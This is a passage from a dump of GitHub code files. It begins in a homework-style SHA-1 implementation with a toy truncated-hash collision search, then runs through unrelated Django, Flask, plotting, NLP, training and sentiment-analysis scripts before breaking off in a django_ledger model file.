print(\"chunck \" + str(ii))\n ii = ii+1\n\n print(chunk)\n\n print(nospace(h0))\n print(nospace(h1))\n print(nospace(h2))\n print(nospace(h3))\n print(nospace(h4))\n print(\" \")\n \"\"\"\n\n w = splitChunk(chunk)\n\n for i in range(16,80,1):\n w.append(LS(\n b_xor(\n b_xor(w[i-3],w[i-8]),\n b_xor(w[i-14],w[i-16])\n )\n )\n )\n\n index = 0\n if(verbose):\n for ww in w: \n print(str(index) + \" \" + prettyHex(toInt(ww),8))\n print(str(index) + \" \" + nospace(ww))\n index = index + 1\n \n #print(len(w))\n\n ha = h0\n hb = h1\n hc = h2\n hd = h3\n he = h4\n\n f = []\n\n for jj in range(0,20,1):\n f = b_or(\n b_and(hb,hc),\n b_and(b_not(hb),hd)\n )\n k = toBinArray(0x5A827999,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n for jj in range(20,40,1):\n f = b_xor(\n b_xor(hb,hc),\n hd\n )\n k = toBinArray(0x6ED9EBA1,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n for jj in range(40,60,1):\n f = b_or(\n b_or(\n b_and(hb,hc),\n b_and(hb,hd)\n ),\n b_and(hc,hd)\n )\n k = toBinArray(0x8F1BBCDC,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n for jj in range(60,80,1):\n f = b_xor(\n b_xor(hb,hc),\n hd\n )\n k = toBinArray(0xCA62C1D6,32)\n \n #print(jj)\n ha,hb,hc,hd,he = takeStep(ha,hb,hc,hd,he,f,k,w[jj])\n\n\n h0 = b_add(h0,ha)\n h1 = b_add(h1,hb)\n h2 = b_add(h2,hc)\n h3 = b_add(h3,hd)\n h4 = b_add(h4,he)\n\n hh = []\n\n for h in h0: hh.append(h)\n for h in h1: hh.append(h)\n for h in h2: hh.append(h)\n for h in h3: hh.append(h)\n for h in h4: hh.append(h)\n\n return hh\n\ndef attackBytes(barray1,barray2, length = 8, index = 0):\n\n #print(\"\")\n #print(len(barray1))\n #print(len(barray2))\n\n sha11 = sha1(barray1, verbose=False)\n sha12 = sha1(barray2, verbose=False)\n\n #print(\"sha1_1 = \" + prettyHex(toInt(sha11),20))\n #print(\"sha1_2 = \" + prettyHex(toInt(sha12),20))\n\n f1 = first32(sha11,length)\n f2 = first32(sha12,length)\n\n #print(first32(sha11))\n #print(first32(sha12))\n\n d1 = dict()\n d2 = dict()\n\n d1[f1] = -1\n d2[f2] = -1\n\n s1 = 0\n s2 = 0\n\n for i in range(1<<32):\n \n seed = random.randrange(1<<20)\n #seed = i\n\n selection = genSelection(seed,index)\n f1 = first32(sha1(mutate(barray1,selection)),length)\n f2 = first32(sha1(mutate(barray2,selection)),length)\n\n #print(f1,f2)\n\n #print(barray1)\n\n d1[f1] = seed\n d2[f2] = seed\n\n if(i%100 == 0 and i!=0): \n print(\".\",end = \"\")\n stdout.flush()\n #print(f1,f2)\n\n if f1 in d2:\n\n s1 = d1[f1]\n s2 = d2[f1]\n break\n\n if f2 in d1:\n #print(f2)\n s2 = seed\n s1 = d1[f2]\n break\n\n\n nba1 = mutate(barray1,genSelection(s1,index))\n nba2 = mutate(barray2,genSelection(s2,index))\n\n #print(len(nba1))\n #print(len(nba2))\n print(\"\")\n\n return nba1, nba2\n\ndef attackFiles(file1, file2, length):\n\n print(\"\\nprocessing images...\", end = \"\")\n\n barray1 = readBytes(file1)\n barray2 = readBytes(file2)\n\n nba1, nba2 = attackBytes(barray1,barray2, length, 100)\n\n nfile1 = \"new_\" + file1\n nfile2 = \"new_\" + file2\n\n writeBytes(nba1,nfile1)\n writeBytes(nba2,nfile2)\n\n\n\nx = []\n\nfor j in range(534): x.append(randByte())\n\ntext1 = \"abc\"\ntext2 = \"acc\" #one bit changed: b = 01100010, c = 01100011\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"text1 = \" + text1)\nprint(\"sha1_1 = \" + nospace(sha11))\nprint(\"sha1_2 = \" + nospace(sha12))\nprint(\"sha1_1 = \" + prettyHex(toInt(sha11),20))\nprint(\"expected = \" + 
\"A9993E364706816ABA3E25717850C26C9CD0D89D\")\n\nprint(\"sha1_2 = \" + prettyHex(toInt(sha12),20))\nprint(\"hamming distance = \" + str(hamming(sha11,sha12)))\nprint(\"______________________________________________________\\n\")\n\n#\"\"\"\nattackFiles(\"battleship.bmp\", \"mac.bmp\",4)\nbt1 = readBytes(\"new_battleship.bmp\")\nbt2 = readBytes(\"new_mac.bmp\")\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"sha1_battleship = \" + prettyHex(toInt(sha11),20))\nprint(\"sha1_flower = \" + prettyHex(toInt(sha12),20))\n#\"\"\"\n\n#\"\"\"\ntext1 = \"qazwsxedcrfvtgbyhnujmik,ol.p;/['][poiuytrewqasdfghj\"\ntext2 = \"bchdkahdnsmxboenskckqlsjba,mbsiudqweqweqweqaqasdsdf\"\n\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nprint(\"___________________________________________________\\n\")\nprint(\"processing texts...\", end = \"\")\nnba1, nba2 = attackBytes(bt1, bt2,4)\n\ntext1 = nba1.decode(\"utf-8\")\ntext2 = nba2.decode(\"utf-8\")\n\nprint(\"\")\nprint(\"text1_m = \" + text1)\nprint(\"text2_m = \" + text2)\nprint(\"\")\n\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"sha1_1m = \" + prettyHex(toInt(sha11),20))\nprint(\"sha1_1m = \" + prettyHex(toInt(sha12),20))\n#\"\"\"\n\ntext1 = \"pa{wsyddbrgvtfbyioujmhj-nm/p;/Z&\\Zpoiuxusevqareffhj\"\ntext2 = \"bbidkaiensmxcodnskckqlrjb`,mbsitdqweqvepwdq`qardsef\"\n\nprint(\"\")\nprint(\"text1_m = \" + text1)\nprint(\"text2_m = \" + text2)\nprint(\"\")\n\nbt1 = bytearray()\nbt1.extend(map(ord, text1))\nbt2 = bytearray()\nbt2.extend(map(ord, text2))\n\nsha11 = sha1(bt1)\nsha12 = sha1(bt2)\n\nprint(\"sha1_1m = \" + prettyHex(toInt(sha11),20))\nprint(\"sha1_1m = \" + prettyHex(toInt(sha12),20))","repo_name":"stefanrzv2000/crypto","sub_path":"T9/sha1.py","file_name":"sha1.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1250358653","text":"from tyadmin_api import auto_views\nfrom django.urls import re_path, include, path\nfrom rest_framework.routers import DefaultRouter\n \nrouter = DefaultRouter(trailing_slash=False)\n \nrouter.register('permission', auto_views.PermissionViewSet)\n \nrouter.register('group', auto_views.GroupViewSet)\n \nrouter.register('content_type', auto_views.ContentTypeViewSet)\n \nrouter.register('t_user', auto_views.TUserViewSet)\n \nrouter.register('t_analysis', auto_views.TAnalysisViewSet)\n \nrouter.register('t_camera', auto_views.TCameraViewSet)\n \nrouter.register('user_profile', auto_views.UserProfileViewSet)\n \nurlpatterns = [\n re_path('^', include(router.urls)),\n ]\n ","repo_name":"thomas-yanxin/the-eye-knows-the-garbage","sub_path":"tyadmin_api/auto_url.py","file_name":"auto_url.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"40"} +{"seq_id":"6073256896","text":"# This program draws the graphs of the action versus the Markovian\n# time for the hot and the cold starts of the thermalization\n\nfrom math import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ni_cold, S_cold = np.genfromtxt(\"../results/cold_therm.dat\", unpack=True)\ni_hot, S_hot = np.genfromtxt(\"../results/hot_therm.dat\", unpack=True)\n\nfig1 = plt.figure(1)\nplt.plot(i_cold[:100], S_cold[:100], ls='-',\n lw=1, c='blue', label='Cold Start')\nplt.plot(i_hot[:100], S_hot[:100], ls='-', lw=1, c='red', label='Hot 
Start')\nplt.title(\"Thermalization\")\nplt.xlabel(\"Markovian time\")\nplt.ylabel(\"S\")\nplt.grid(linestyle=':')\nplt.legend()\nplt.text(77.5, 420, \"Parameters:\\n\\nN = 64\\nM = 1\\nW = 1\",\n size=12, bbox=dict(fc=\"white\"))\n\n# Zoom on the first 25 indices\nfig2 = plt.figure(2)\nplt.plot(i_cold[:26], S_cold[:26], ls='-',\n lw=1, c='blue', label='Cold Start')\nplt.plot(i_hot[:26], S_hot[:26], ls='-',\n lw=1, c='red', label='Hot Start')\nplt.title(\"Thermalization (zoom)\")\nplt.xlabel(\"Markovian time\")\nplt.ylabel(\"S\")\nplt.grid(linestyle=':')\nplt.legend()\nplt.text(19.57, 420, \"Parameters:\\n\\nN = 64\\nM = 1\\nW = 1\",\n size=12, bbox=dict(fc=\"white\"))\n\n# Saving the graphs\nfig1.savefig('graphs/first_thermalization.png', dpi=(200), bbox_inches='tight')\nfig2.savefig('graphs/thermalization.png', dpi=(200), bbox_inches='tight')\n","repo_name":"BeaGiudici/Harmonic-Oscillator","sub_path":"fit/thermal_fit.py","file_name":"thermal_fit.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33635715196","text":"import json\nimport argparse\nfrom tqdm import tqdm\n\n\ndef process(infile, outsrc, outtgt, format):\n out_examples = []\n with open(infile, 'r', encoding='utf-8') as fin:\n for line in tqdm(fin):\n ex = json.loads(line)\n source = ex['article']['text']\n target = ex['abstract']['text']\n if len(source) == 0 or len(target) == 0:\n continue\n if format == 'txt':\n out_examples.append((source, target))\n elif format == 'json':\n out_examples.append({'src': source, 'tgt': target})\n\n if format == 'txt':\n with open(outsrc, 'w', encoding='utf-8') as fsrc, open(outtgt, 'w', encoding='utf-8') as ftgt:\n fsrc.write('\\n'.join([ex[0] for ex in out_examples]))\n ftgt.write('\\n'.join([ex[1] for ex in out_examples]))\n elif format == 'json':\n with open(outsrc, 'w', encoding='utf-8') as fout:\n fout.write('\\n'.join([json.dumps(ex) for ex in out_examples]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='format.py', formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument('-input_json', default='', help='input json file')\n parser.add_argument('-output_source', default='', help='output source file')\n parser.add_argument('-output_target', default='', help='output target file')\n parser.add_argument('-format', default='txt', help='output format type')\n args = parser.parse_args()\n process(args.input_json, args.output_source, args.output_target, args.format)\n","repo_name":"uclanlp/DeepKPG","sub_path":"data/format_summarization.py","file_name":"format_summarization.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"7328645079","text":"over18 = men = wu20 = 0\nwhile True:\n print('---- Sign up ----')\n age = int(input('Age: '))\n while age < 0:\n age = int(input('Invalid!\\nAge: '))\n\n if age >= 18:\n over18 += 1\n\n gender = str(input('Gender [M/F]: ')).upper().strip()\n while gender != 'M' and gender != 'F':\n gender = str(input('Invalid!\\nGender [M/F]: ')).upper().strip()\n\n if gender == 'M':\n men += 1\n\n if gender == 'F' and age < 20:\n wu20 += 1\n\n answer = str(input('Do you wanna continue? [Y/N] ')).upper().strip()\n while answer != 'Y' and answer != 'N':\n answer = str(input('Invalid!\\nDo you wanna continue? 
[Y/N] ')).upper().strip()\n\n if answer == 'N':\n break\n\nprint(f'''There is(are) {over18} person(s) over 18 years old\nThere is(are) {men} man(men) signed up\nThere is(are) {wu20} woman(women) under 20 years old''')","repo_name":"heitorlisboa/python-studies","sub_path":"CursoEmVídeo/PythonExercícios/ex069 - Analisador completo v2 (infinito).py","file_name":"ex069 - Analisador completo v2 (infinito).py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25164805597","text":"from django.conf.urls import url\nfrom . import views\n \nurlpatterns = [\n url(r'^$', views.index),\n url(r'^tailor$', views.tailor),\n url(r'^process_survey$', views.process_survey),\n url(r'^matches$', views.matches),\n url(r'^sample$', views.sample_booking),\n]","repo_name":"spartantech8/Paradise-Tailored","sub_path":"apps/paradise_tailored_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24227542496","text":"from bokeh.plotting import figure\r\nfrom bokeh.io import output_file, show\r\nfrom bokeh.models import DatetimeTickFormatter\r\nimport pandas\r\nfrom datetime import datetime\r\n\r\ndf = pandas.read_json(\"https://pomber.github.io/covid19/timeseries.json\")\r\n\r\n\r\ndf1 = pandas.DataFrame(columns=['Date', 'Confirmed', 'Deaths', 'Recovered'])\r\n\r\n\r\nfor i in list(df[\"Australia\"]):\r\n df1 = df1.append({'Date': datetime.strptime(i[\"date\"], '%Y-%m-%d'), 'Confirmed': i[\"confirmed\"], 'Deaths': i[\"deaths\"], 'Recovered': i[\"recovered\"]}, ignore_index=True)\r\n\r\n\r\nf=figure(plot_width=700,plot_height=500,tools='save',x_axis_type='datetime')\r\n\r\nf.title.text=\"Covid-19 statistics for Australia\"\r\nf.title.text_font_style=\"bold\"\r\nf.xaxis.axis_label=\"Date\"\r\n#convert time to AU standard day/month rather than month/day\r\nf.xaxis.formatter=DatetimeTickFormatter(days=\"%d/%m\")\r\nf.yaxis.axis_label=\"Cases\"\r\nf.yaxis.formatter.use_scientific = False\r\n\r\n#create plot\r\nf.line(df1[\"Date\"],df1[\"Confirmed\"],color=\"Orange\")\r\nf.line(df1[\"Date\"],df1[\"Deaths\"],color=\"Red\")\r\nf.line(df1[\"Date\"],df1[\"Recovered\"],color=\"Green\")\r\n\r\nshow(f)","repo_name":"craigles75/corona","sub_path":"corona_bokeh.py","file_name":"corona_bokeh.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4565299385","text":"# -*- coding: utf-8 -*-\n\"\"\"\n vyakarana.lists\n ~~~~~~~~~~~~~~~\n\n Lists of various terms, designations, and sounds. Some of these\n lists could probably be inferred programmatically, but for the sake\n of basic sanity these are encoded explicitly. Thankfully these lists\n are rather small.\n\n :license: MIT and BSD\n\"\"\"\n\n#: Defined in rule 3.4.78. 
These 18 affixes are used to form verbs.\n#: The first 9 are called \"parasmaipada\" (1.4.99), and the last 9 are\n#: called \"ātmanepada\" (1.4.100).\nTIN = ['tip', 'tas', 'Ji', 'sip', 'Tas', 'Ta', 'mip', 'vas', 'mas',\n 'ta', 'AtAm', 'Ja', 'TAs', 'ATAm', 'Dvam', 'iw', 'vahi', 'mahiN']\n\n\n#: Abstract suffixes that are replaced with items from `TIN`.\n#: Collectively, they are called the \"lakāra\" or just \"la\".\nLA = set([\n 'la~w', 'li~w', 'lu~w', 'lf~w', 'le~w', 'lo~w',\n 'la~N', 'li~N', 'lu~N', 'lf~N'\n])\n\n\n#: Various pratyaya\nPRATYAYA = set([\n 'luk', 'Slu', 'lup',\n 'Sap', 'Syan', 'Snu', 'Sa', 'Snam', 'u', 'SnA',\n 'Ric', 'Rin'\n]) | LA\n\n\n#: Technical designations (1.3.2 - 1.3.9)\nIT = (set([L + 'it' for L in 'kKGNcYwqRpmS'])\n | set([L + 'dit' for L in 'aiuUfxo'])\n | set(['qvit', 'wvit'])\n | set(['svaritet', 'anudattet', 'svarita', 'anudatta']))\n\n\n#: saṃjñā for verb 'pada'\nPADA = ['parasmaipada', 'atmanepada']\n\n\n#: saṃjñā for various persons\nPURUSHA = ['prathama', 'madhyama', 'uttama']\n\n\n#: saṃjñā for various numbers\nVACANA = ['ekavacana', 'dvivacana', 'bahuvacana']\n\n\n#: saṃjñā for case triplets\nVIBHAKTI = ['prathama', 'dvitiya', 'trtiya', 'caturthi',\n 'pancami', 'sasthi', 'saptami']\n\n\n#: saṃjñā for verb suffixes\nDHATUKA = ['sarvadhatuka', 'ardhadhatuka']\n\n\n#: saṃjñā for kāraka relations (currently unused)\nKARAKA = ['karta', 'karma', 'karana', 'adhikarana', 'sampradana', 'apadana']\n\n\n#: All saṃjñā\nSAMJNA = set([\n 'guna', 'vrddhi',\n 'dhatu', 'anga', 'pada', 'pratyaya',\n 'krt', 'taddhita',\n 'abhyasa', 'abhyasta',\n 'tin', 'sup',\n]) | set(PADA + PURUSHA + VACANA + VIBHAKTI + DHATUKA + KARAKA)\n\n\n#: A collection of various sounds, including:\n#:\n#: - savarṇa sets (1.1.69)\n#: - single-item sets (1.1.70)\n#: - pratyāhāra (1.1.71)\nSOUNDS = set([\n # 1.1.69 aṇudit savarṇasya cāpratyayaḥ\n 'a', 'i', 'u', 'f', 'x',\n 'ku~', 'cu~', 'wu~', 'tu~', 'pu~',\n\n # 1.1.70 taparas tatkālasya\n 'at', 'At', 'it', 'It', 'ut', 'Ut', 'ft', 'Ft', 'et', 'Et', 'ot', 'Ot',\n\n # 1.1.71 ādir antyena sahetā\n # Although the Shiva Sutras allow a large number of pratyāhāras,\n # only the following are used in the Ashtadhyayi.\n # (Sharma Volume I, p. 
33)\n 'eN', 'yaY', 'aR', 'Cav', 'aw',\n 'Jaz', 'Baz',\n 'ak', 'ik', 'uk', 'yaR', 'iR', 'Nam', 'am', 'yam',\n 'ac', 'ec', 'Ec', 'ic', 'may', 'Jay', 'Kay', 'yay',\n 'Sar', 'yar', 'Jar', 'Kar', 'car',\n 'JaS', 'jaS', 'baS', 'S', 'haS', 'vaS',\n 'al', 'hal', 'sal', 'val', 'ral', 'Jal'\n])\n","repo_name":"sanskrit/vyakarana","sub_path":"vyakarana/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"16561039720","text":"import sys\n\ndef search_by_key(company: str) -> str:\n COMPANIES = {\n 'Apple': 'AAPL',\n 'Microsoft': 'MSFT',\n 'Netflix': 'NFLX',\n 'Tesla': 'TSLA',\n 'Nokia': 'NOK'\n }\n STOCKS = {\n 'AAPL': 287.73,\n 'MSFT': 173.79,\n 'NFLX': 416.90,\n 'TSLA': 724.88,\n 'NOK': 3.37\n }\n comp = ''\n for val in COMPANIES:\n if company.capitalize() == val:\n comp = COMPANIES[val]\n if comp == '':\n return \"Unknown company\"\n for val in STOCKS:\n if comp == val:\n return STOCKS[val]\n\ndef main():\n if len(sys.argv) == 2:\n print(search_by_key(sys.argv[1]))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"MashkaCoder/piscine_python_data_science42","sub_path":"day01/ex02/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40311009461","text":"from flask_smorest import Blueprint\nfrom flask.views import MethodView\nfrom flask import jsonify\nfrom app.models.pet import Pet\nfrom app.models.breed import Breed\nfrom app.schemas.pet import pets_schema, pet_query_schema, pet_schema, pet_update_schema\nfrom app import db\nimport datetime\n\nclass PetMessageCode ():\n NOT_FOUND = \"La mascota no existe\"\n\nbp = Blueprint(\"pet_api\", __name__)\n\nPER_PAGE_DEFAULT = 5\n\n@bp.route(\"/\")\nclass Pets(MethodView):\n @bp.arguments(pet_query_schema, location=\"query\")\n @bp.response(200, pets_schema)\n @bp.paginate(page_size=PER_PAGE_DEFAULT)\n def get(self, query, pagination_parameters):\n \"\"\"Listar mascota\"\"\"\n pets = Pet.query.order_by(Pet.birth_date.desc(), Pet.name.desc(), Pet.owner_name.desc())\n\n pagination_parameters.item_count = pets.count()\n\n if \"owner_dni\" in query.keys():\n pets = Pet.query.filter(Pet.owner_dni == query[\"owner_dni\"])\n \n return pets.paginate(page=pagination_parameters.page, per_page=pagination_parameters.page_size, error_out=True).items\n \n @bp.arguments(pet_schema)\n @bp.response(201, pet_schema)\n def post(self, new_data):\n \"\"\"Agregar mascota\"\"\"\n if Breed.query.get(new_data.breed_id) is None:\n return jsonify({ \"message\": \"Raza inválida\"}), 422 \n\n db.session.add(new_data)\n db.session.commit()\n\n return new_data\n\n@bp.route(\"/<int:id>\")\nclass PetsById(MethodView):\n @bp.response(200, pet_schema)\n def get(self, id):\n \"\"\"Obtener mascota por id\"\"\"\n pet = Pet.query.get(id)\n\n if pet is None:\n return jsonify({\"message\": PetMessageCode.NOT_FOUND}), 404\n \n return pet\n \n @bp.arguments(pet_update_schema)\n @bp.response(200, pet_schema)\n def put(self, data, id):\n \"\"\"Actualizar mascota por id\"\"\"\n if Breed.query.get(data[\"breed_id\"]) is None:\n return jsonify({ \"message\": \"Raza inválida\"}), 422 \n \n pet = Pet.query.get(id)\n\n if pet is None:\n return jsonify({\"message\": PetMessageCode.NOT_FOUND}), 404\n\n pet.from_dict(**data)\n pet.updated_at = datetime.datetime.now()\n\n db.session.add(pet)\n db.session.commit()\n\n return pet\n\n 
@bp.response(200)\n def delete(self, id):\n \"\"\"Eliminar mascota por id\"\"\"\n pet = Pet.query.get(id)\n \n if pet is None:\n return jsonify({\"message\": PetMessageCode.NOT_FOUND}), 404\n \n db.session.delete(pet)\n db.session.commit()\n\n return jsonify({\"message\": \"Mascota eliminada con éxito\"})","repo_name":"Rodolfo-Andre/flask-application","sub_path":"app/blueprints/pet_api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73897544120","text":"import pdb\nimport os\nimport logging\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom sklearn import metrics\n\n\nclass Trainer():\n def __init__(self, model, data, params):\n self.model = model\n self.data = data\n self.optimizer = None\n self.params = params\n\n if params.optimizer == \"SGD\":\n self.optimizer = optim.SGD(self.model.parameters(), lr=params.lr, momentum=params.momentum)\n if params.optimizer == \"Adam\":\n self.optimizer = optim.Adam(self.model.parameters(), lr=params.lr)\n\n self.criterion = nn.MarginRankingLoss(self.params.margin, reduction='sum')\n\n self.best_metric = 1e10\n self.last_metric = 1e10\n self.bad_count = 0\n\n assert self.optimizer is not None\n\n def one_epoch(self):\n all_pos_scores = []\n all_neg_scores = []\n total_loss = 0\n for b in range(self.params.nBatches):\n batch_h, batch_t, batch_r, batch_y = self.data.get_batch(b)\n loss, pos_score, neg_score = self.model(batch_h, batch_t, batch_r, batch_y)\n\n all_pos_scores += pos_score.detach().cpu().tolist()\n all_neg_scores += neg_score.detach().cpu().tolist()\n\n total_loss += loss.detach().cpu()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n all_labels = [0] * len(all_pos_scores) + [1] * len(all_neg_scores)\n auc = metrics.roc_auc_score(all_labels, all_pos_scores + all_neg_scores)\n\n return total_loss, auc\n\n def select_model(self, log_data):\n if log_data['auc'] < self.best_metric:\n self.bad_count = 0\n torch.save(self.model, os.path.join(self.params.exp_dir, 'best_model.pth')) # Does it overwrite or fuck with the existing file?\n logging.info('Better model found w.r.t MR. Saved it!')\n self.best_mr = log_data['auc']\n else:\n self.bad_count = self.bad_count + 1\n if self.bad_count > self.params.patience:\n logging.info('Out of patience. 
Stopping the training loop.')\n return False\n self.last_metric = log_data['auc']\n return True\n","repo_name":"kkteru/node-embeddings","sub_path":"managers/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"40"} +{"seq_id":"6514129063","text":"from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\ndef analyze_tweets(tweet_list):\n neg, neu, pos, count = 0, 0, 0, 0\n analyzer = SentimentIntensityAnalyzer()\n pos_tweet, neg_tweet = {'score': 0, 'id': 0}, {'score': 0, 'id': 0}\n for tweet in tweet_list: # Sum up all of the scores\n score = analyzer.polarity_scores(tweet.text)\n neg += score['neg']\n neu += score['neu']\n pos += score['pos']\n if score['neg'] > neg_tweet['score']:\n neg_tweet['score'] = score['neg']\n neg_tweet['id'] = tweet.id\n if score['pos'] > pos_tweet['score']:\n pos_tweet['score'] = score['pos']\n pos_tweet['id'] = tweet.id\n count += 1\n if count == 0:\n return {\"error\": \"No matches were found for this phrase\"}\n \n # Nomralize the scores for the number of tweets searched\n neg /= count \n neu /= count\n pos /= count\n \n statement = \"\"\n analysis = \"\"\n # Assign an analysis and statement\n if neg == pos:\n statement += \"Neutral\"\n analysis += \"Score: 1.000\"\n elif neg == 0:\n statement += \"Maximum Positivity\"\n analysis += \"No detected negativity\"\n elif pos == 0:\n statement += \"Maximum Negativity\"\n analysis += \"No detected positivity\"\n elif pos > neg:\n ratio = pos / neg\n if ratio < 2:\n statement += \"Slightly Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 5:\n statement += \"Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 10:\n statement += \"Very Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n else:\n statement += \"Extremely Positive\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif neg > pos:\n ratio = neg / pos\n if ratio < 2:\n statement += \"Slightly Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 5:\n statement += \"Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n elif ratio < 10:\n statement += \"Very Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n else:\n statement += \"Extremely Negative\"\n analysis += \"Score: {0:.3f}\".format(ratio)\n else:\n statement += \"This is a neutral subject!\"\n \n return {\n \"statement\": statement, \n \"analysis\": analysis, \n # \"count\": count, # for debugging\n \"pos_tweet\": pos_tweet, \n \"neg_tweet\": neg_tweet\n }\n \ndef isEnglish(s):\n try:\n s.decode('ascii')\n except:\n return False\n else:\n return True","repo_name":"baileyguthrie/birb.io","sub_path":"webapp/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70993411000","text":"from decimal import Decimal\nfrom string import ascii_lowercase, digits\nfrom uuid import uuid4, UUID\n\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\nfrom django.core.validators import MinValueValidator\nfrom django.db import models, transaction, IntegrityError\nfrom django.db.models import Q, Sum, F, ExpressionWrapper, DecimalField, Value, Case, When, QuerySet\nfrom django.db.models.functions import Coalesce\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_ledger.models.mixins import CreateUpdateMixIn\nfrom 
django_ledger.models.utils import lazy_loader\nfrom django_ledger.settings import (DJANGO_LEDGER_TRANSACTION_MAX_TOLERANCE, DJANGO_LEDGER_DOCUMENT_NUMBER_PADDING,\n DJANGO_LEDGER_EXPENSE_NUMBER_PREFIX, DJANGO_LEDGER_INVENTORY_NUMBER_PREFIX,\n DJANGO_LEDGER_PRODUCT_NUMBER_PREFIX)\n\nITEM_LIST_RANDOM_SLUG_SUFFIX = ascii_lowercase + digits\n\n\nclass ItemModelValidationError(ValidationError):\n pass\n\n\nclass UnitOfMeasureModelQuerySet(models.QuerySet):\n pass\n\n\n# UNIT OF MEASURES MODEL....\nclass UnitOfMeasureModelManager(models.Manager):\n \"\"\"\n A custom defined QuerySet Manager for the UnitOfMeasureModel.\n \"\"\"\n\n def for_entity(self, entity_slug: str, user_model) -> QuerySet:\n \"\"\"\n Fetches the UnitOfMeasureModels associated with the provided EntityModel and UserModel.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The EntityModel slug or EntityModel used to filter the QuerySet.\n user_model: UserModel\n The Django UserModel to check permissions.\n\n Returns\n -------\n QuerySet\n A QuerySet with applied filters.\n \"\"\"\n qs = self.get_queryset()\n if isinstance(entity_slug, lazy_loader.get_entity_model()):\n return qs.filter(\n Q(entity=entity_slug) &\n (\n Q(entity__admin=user_model) |\n Q(entity__managers__in=[user_model])\n )\n )\n return qs.filter(\n Q(entity__slug__exact=entity_slug) &\n (\n Q(entity__admin=user_model) |\n Q(entity__managers__in=[user_model])\n )\n )\n\n def for_entity_active(self, entity_slug: str, user_model):\n \"\"\"\n Fetches the Active UnitOfMeasureModels associated with the provided EntityModel and UserModel.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The EntityModel slug or EntityModel used to filter the QuerySet.\n user_model: UserModel\n The Django UserModel to check permissions.\n\n Returns\n -------\n QuerySet\n A QuerySet with applied filters.\n \"\"\"\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(is_active=True)\n\n\nclass UnitOfMeasureModelAbstract(CreateUpdateMixIn):\n \"\"\"\n Base implementation of a Unit of Measure assigned to each Item Transaction.\n\n Attributes\n ----------\n uuid: UUID\n This is a unique primary key generated for the table. The default value of this field is uuid4().\n name: str\n The name of the unit of measure. 
